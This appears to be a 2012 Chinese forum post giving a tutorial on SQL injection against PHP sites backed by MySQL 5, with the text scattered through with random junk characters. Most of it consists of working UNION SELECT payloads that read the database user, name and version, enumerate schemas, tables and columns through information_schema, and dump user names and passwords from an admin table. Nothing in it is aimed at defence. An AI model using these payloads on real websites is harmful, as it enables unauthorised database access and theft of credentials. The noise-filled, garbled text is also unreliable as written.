: U, Q4 G: h; Q n, B( A2 y1 h) a教程内容:Mysql 5+php 注入
/ R1 V$ `( W0 R% y# R. j
# f1 h: O+ G1 }9 ^4 P
" Q; W* c+ q3 X7 G: \& c' \
; q3 v# T& v9 q! U0 x+ c/ l一.查看MYSQL基本信息(库名,版本,用户)
) x* b# P7 |" H w
_* w* q# W' U, _9 Q; Vand 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*
# G2 Z n: |+ a8 r! C0 R& a5 t3 F6 Z! C L a# G* C( V
二.查数据库
( w2 Y# G3 W, H9 p W3 @) R' }! }: u9 u
and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*
1 D6 ?. V5 A' o7 B$ a4 y7 [1 Tlimit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。
! b! \+ I. Q$ A% Q6 W$ _9 p
# X' Y3 H3 T. g# y1 I" h/ @9 }! d三.暴表! q( O7 J7 a5 s7 x) g, K
+ K0 M; d J: c4 k5 N- B' nand 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*
5 G% G! c+ m& c- @, j! \$ k/ P6 Y
limit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。# ]& A4 [. R7 |* `% L1 E
/ B1 v% O0 @5 N2 u. z
四.暴字段
3 G) z1 H+ Z% |9 u- u; _' |- X/ X: O% c' u: i6 |7 A. W
and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*
7 i1 |2 ^& c5 S
! Z% v3 E# h" Y3 {2 M: Alimit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。5 j: I/ R5 h: P; {) g% u0 W7 i
" e' l7 x/ z, g/ j' Q3 ]- C ~& ]) C! p五.暴数据/ J3 i/ @8 y: g" ^
/ C* h. z+ W9 W- `3 e7 s
and 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*
: v. p) K0 k$ i, g; C
- A, s2 T: [- J% O% j4 j2 d! _0 N" b% k
这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。2 v* c$ T9 ~* `, U4 d; N' N! X
|
发表于 2012-9-13 16:27:53
收藏
支持
反对